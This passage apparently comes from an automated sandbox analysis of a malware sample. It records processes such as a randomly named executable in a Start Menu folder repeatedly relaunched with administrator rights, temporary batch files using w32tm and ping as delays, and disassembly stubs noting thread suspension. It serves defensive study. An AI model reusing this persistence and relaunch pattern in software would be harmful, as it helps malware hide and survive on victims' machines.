                                                        Target ID:24
                                                        Start time:12:48:14
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:25
                                                        Start time:12:48:15
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:12:48:20
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x6f0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:28
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:29
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:30
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:31
                                                        Start time:12:48:24
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:32
                                                        Start time:12:48:29
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x100000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:34
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:35
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:36
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:37
                                                        Start time:12:48:34
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff757150000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:38
                                                        Start time:12:48:43
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x690000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:40
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:41
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:42
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:43
                                                        Start time:12:48:47
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:44
                                                        Start time:12:48:52
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xbe0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:46
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:47
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:48
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:49
                                                        Start time:12:48:57
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:50
                                                        Start time:12:49:03
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0xcc0000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:52
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:53
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:54
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff7450c0000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:55
                                                        Start time:12:49:09
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\w32tm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        Imagebase:0x7ff791ec0000
                                                        File size:108'032 bytes
                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:56
                                                        Start time:12:49:14
                                                        Start date:02/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                                                        Imagebase:0x240000
                                                        File size:3'923'968 bytes
                                                        MD5 hash:832D64C5F330BE9505301104FCFC574A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:58
                                                        Start time:12:49:22
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                                                        Imagebase:0x7ff7f9610000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:59
                                                        Start time:12:49:22
                                                        Start date:02/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:5.1%
                                                          Dynamic/Decrypted Code Coverage:25%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:12
                                                          Total number of Limit Nodes:0
                                                          execution_graph 21050 7ff848c009f5 21051 7ff848c00a0f GetFileAttributesW 21050->21051 21053 7ff848c00ad5 21051->21053 21042 7ff848bfd35d 21043 7ff848bfd36b SuspendThread 21042->21043 21045 7ff848bfd444 21043->21045 21046 7ff848bfecd9 21047 7ff848bfece7 CloseHandle 21046->21047 21049 7ff848bfedc4 21047->21049 21054 7ff848bfeb78 21055 7ff848bfebb3 ResumeThread 21054->21055 21057 7ff848bfec84 21055->21057

                                                          Executed Functions

                                                          Function 00007FF84915386F Relevance: .7, Instructions: 734COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 297 7ff84915386f-7ff849153882 298 7ff8491538ce-7ff8491538e4 297->298 299 7ff849153884-7ff849153bc5 297->299 301 7ff8491538ea-7ff8491538f2 298->301 302 7ff849153974-7ff8491539ad 298->302 303 7ff849153bcf-7ff849153bf9 299->303 301->303 304 7ff8491538f8-7ff84915390a 301->304 311 7ff8491539ae-7ff8491539c4 302->311 312 7ff849153c0f-7ff849153c11 303->312 304->303 306 7ff849153910-7ff849153927 304->306 309 7ff849153929-7ff849153930 306->309 310 7ff849153967-7ff84915396e 306->310 309->303 313 7ff849153936-7ff849153964 309->313 310->301 310->302 311->303 314 7ff8491539ca-7ff8491539ee 311->314 315 7ff849153c1b-7ff849153cb1 312->315 313->310 317 7ff8491539f0-7ff849153a13 314->317 318 7ff849153a41-7ff849153a48 314->318 321 7ff849153cbc-7ff849153cff 315->321 322 7ff849153c36-7ff849153cb6 315->322 317->303 327 7ff849153a19-7ff849153a3f 317->327 318->311 319 7ff849153a4e-7ff849153a57 318->319 324 7ff849153a5d-7ff849153a63 319->324 325 7ff849153b8f-7ff849153b9d 319->325 338 7ff849153d01-7ff849153d56 call 7ff849195538 321->338 322->321 335 7ff849153c58-7ff849153cb8 322->335 324->303 328 7ff849153a69-7ff849153a78 324->328 329 7ff849153b9f 325->329 330 7ff849153ba4-7ff849153bb5 325->330 327->317 327->318 332 7ff849153a7e-7ff849153a85 328->332 333 7ff849153b82-7ff849153b89 328->333 329->330 332->303 336 7ff849153a8b-7ff849153a95 332->336 333->324 333->325 335->321 343 7ff849153c7c-7ff849153cba 335->343 342 7ff849153a9c-7ff849153aa7 336->342 360 7ff849153d61-7ff849153e07 338->360 344 7ff849153aa9-7ff849153ac0 342->344 345 7ff849153ae6-7ff849153af5 342->345 343->321 357 7ff849153c9d-7ff849153cb0 343->357 344->303 346 7ff849153ac6-7ff849153ae2 344->346 345->303 348 7ff849153afb-7ff849153b1f 345->348 346->344 350 7ff849153ae4 346->350 352 7ff849153b22-7ff849153b3f 348->352 354 7ff849153b62-7ff849153b78 350->354 352->303 356 7ff849153b45-7ff849153b60 352->356 354->303 359 7ff849153b7a-7ff849153b7e 354->359 356->352 356->354 359->333 373 7ff849153e0d-7ff8491541b0 360->373 374 7ff849153f37-7ff849153f54 360->374 375 7ff849153f5a-7ff849153f5f 374->375 376 7ff849154261-7ff8491542c8 374->376 378 7ff849153f62-7ff849153f69 375->378 385 7ff849154438 376->385 380 7ff849153eec-7ff849154259 378->380 381 7ff849153f6b-7ff849153f6f 378->381 380->376 381->338 384 7ff849153f75 381->384 386 7ff849153ff3-7ff849153ff6 384->386 385->385 387 7ff849153ff9-7ff849154000 386->387 388 7ff849154006 387->388 389 7ff849153f77-7ff849153fac call 7ff849153c00 387->389 391 7ff849154076-7ff84915407d 388->391 389->376 397 7ff849153fb2-7ff849153fc2 389->397 393 7ff84915407f-7ff8491540c5 391->393 394 7ff849154008-7ff84915403a call 7ff849153c00 391->394 408 7ff8491540cb-7ff8491540d0 393->408 409 7ff849153e94-7ff849153e98 393->409 394->376 401 7ff849154040-7ff849154068 394->401 397->338 399 7ff849153fc8-7ff849153fe5 397->399 399->376 402 7ff849153feb-7ff849153ff0 399->402 401->376 403 7ff84915406e-7ff849154073 401->403 402->386 403->391 412 7ff849154156-7ff84915415a 408->412 410 7ff849153eea 409->410 411 7ff849153e9a-7ff849154238 409->411 410->378 414 7ff8491540d5-7ff849154104 call 7ff849153c00 412->414 415 7ff849154160-7ff849154166 412->415 414->376 418 7ff84915410a-7ff84915411a 414->418 418->360 419 7ff849154120-7ff84915412f 418->419 419->376 420 7ff849154135-7ff849154148 419->420 420->387 421 7ff84915414e-7ff849154153 420->421 421->412
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f72317af55d14f79b08b692b0f0507055bf10fedea4455e8a8b52dc59194e98
                                                          • Instruction ID: 88f4e80b73e556a328278fba7bcac0340ed2fb6b351cd33bce36753cf92878be
                                                          • Opcode Fuzzy Hash: 2f72317af55d14f79b08b692b0f0507055bf10fedea4455e8a8b52dc59194e98
                                                          • Instruction Fuzzy Hash: 8252AF3091C69A8FEB69DF18C4946B8B7B1FF45350F9041BDD45ECB286DA38A982CF41
                                                          Function 00007FF848A50DA0 Relevance: .3, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c8a48b190eaeb65ed604b86e85df0f60945106f062f8cae16d8b544fb82c616
                                                          • Instruction ID: 05fc6db45868e567eaa877bf63c11b57f973ddd080188248e3df48de79710e15
                                                          • Opcode Fuzzy Hash: 1c8a48b190eaeb65ed604b86e85df0f60945106f062f8cae16d8b544fb82c616
                                                          • Instruction Fuzzy Hash: C2A1BA71D19A8A8FE799EF68D8667BDBBE2FF55340F40017AC009D3296CBB81841CB51
                                                          Function 00007FF848A50B47 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9
                                                          • API String ID: 0-3254877420
                                                          • Opcode ID: b5293a7434c2eb1c95abdb56a9a2597856a7c3303bae22e3ac1a12a28f8e2189
                                                          • Instruction ID: 86a44485d89af8892086e1b288de4536267733db8421102018bdf8fd635dafbc
                                                          • Opcode Fuzzy Hash: b5293a7434c2eb1c95abdb56a9a2597856a7c3303bae22e3ac1a12a28f8e2189
                                                          • Instruction Fuzzy Hash: 95212772A1964E8FDB45EF1CD8825ED77A0FF55365F0001B6E849D3190D730A465CBC2
                                                          Function 00007FF84915D205 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Q^H
                                                          • API String ID: 0-138190856
                                                          • Opcode ID: a778157be66130ebdaf5de61a1724ad931eec40055be982aabeb10fb2aaefa2b
                                                          • Instruction ID: 19a56dc182c26c1777d8f68cbbe090b43ff17172a6408fa6936028a87dfb7968
                                                          • Opcode Fuzzy Hash: a778157be66130ebdaf5de61a1724ad931eec40055be982aabeb10fb2aaefa2b
                                                          • Instruction Fuzzy Hash: 31E1B635E1DACA8FE7A5EF288454678B7E2FF55350F5A00BAC40DC7292DE28AC45CB41
                                                          Function 00007FF848BFEB78 Relevance: 1.7, APIs: 1, Instructions: 161threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 102 7ff848bfeb78-7ff848bfebb1 103 7ff848bfebb4-7ff848bfec82 ResumeThread 102->103 104 7ff848bfebb3 102->104 108 7ff848bfec84 103->108 109 7ff848bfec8a-7ff848bfecd4 103->109 104->103 108->109
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f273f1629647d1d11bce511562ecfa617798d49d4638df3b8f8e7cd62bc983d0
                                                          • Instruction ID: 1cffeba17f23d784ac0df23f87dda38733eb1b05ca77dc1ebc39d8dd8164643c
                                                          • Opcode Fuzzy Hash: f273f1629647d1d11bce511562ecfa617798d49d4638df3b8f8e7cd62bc983d0
                                                          • Instruction Fuzzy Hash: 62516A7090C78C8FDB55DFA8D894AE8BFB0EF56310F1441ABD089DB292DA359846CB11
                                                          Function 00007FF848BFD35D Relevance: 1.6, APIs: 1, Instructions: 142threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 112 7ff848bfd35d-7ff848bfd369 113 7ff848bfd374-7ff848bfd442 SuspendThread 112->113 114 7ff848bfd36b-7ff848bfd373 112->114 118 7ff848bfd444 113->118 119 7ff848bfd44a-7ff848bfd494 113->119 114->113 118->119
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: d82bbfa5c6c70c5008edab6e40f641708c183ad0a117ee9bc1acdcc13270ed00
                                                          • Instruction ID: 4036433f121f9cd813728e14ad51b55eae75702e2d8154b77f6fb7f249f86cae
                                                          • Opcode Fuzzy Hash: d82bbfa5c6c70c5008edab6e40f641708c183ad0a117ee9bc1acdcc13270ed00
                                                          • Instruction Fuzzy Hash: 4B413B70D08A4D8FDB98EFA8D885BEDBBF0FB5A310F14416AD049E7252DB70A845CB45
                                                          Function 00007FF848C009F5 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 122 7ff848c009f5-7ff848c00ad3 GetFileAttributesW 126 7ff848c00ad5 122->126 127 7ff848c00adb-7ff848c00b19 122->127 126->127
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: ca646256b7024d78408b7004232c33d7d845d48d798d9d8643366a96e2d67a86
                                                          • Instruction ID: fdc6c6ab3610cb0cd6f28c7c7c1a731cf4ccb18bbd914f9aa1cdc0414458fe3f
                                                          • Opcode Fuzzy Hash: ca646256b7024d78408b7004232c33d7d845d48d798d9d8643366a96e2d67a86
                                                          • Instruction Fuzzy Hash: 6C410870E0864C8FDB98EF98D885BEDBBF0FB5A310F10416AD009E7252DA719845CF41
                                                          Function 00007FF84915B89B Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: fc47d61a879fc5faab49cf257700e5e87ef0ca91fdbc72187b29c0a3372b8cf2
                                                          • Instruction ID: 822c501caf2aef13c30fe7af9083186eb95ef87f0471382eb4ea6766e8ccb695
                                                          • Opcode Fuzzy Hash: fc47d61a879fc5faab49cf257700e5e87ef0ca91fdbc72187b29c0a3372b8cf2
                                                          • Instruction Fuzzy Hash: 19719D70D5C58ACEEBA9EF648855ABCBBB1FF453A0F5500BAD00ED6186DE2C6841DB01
                                                          Function 00007FF84915F5F8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule

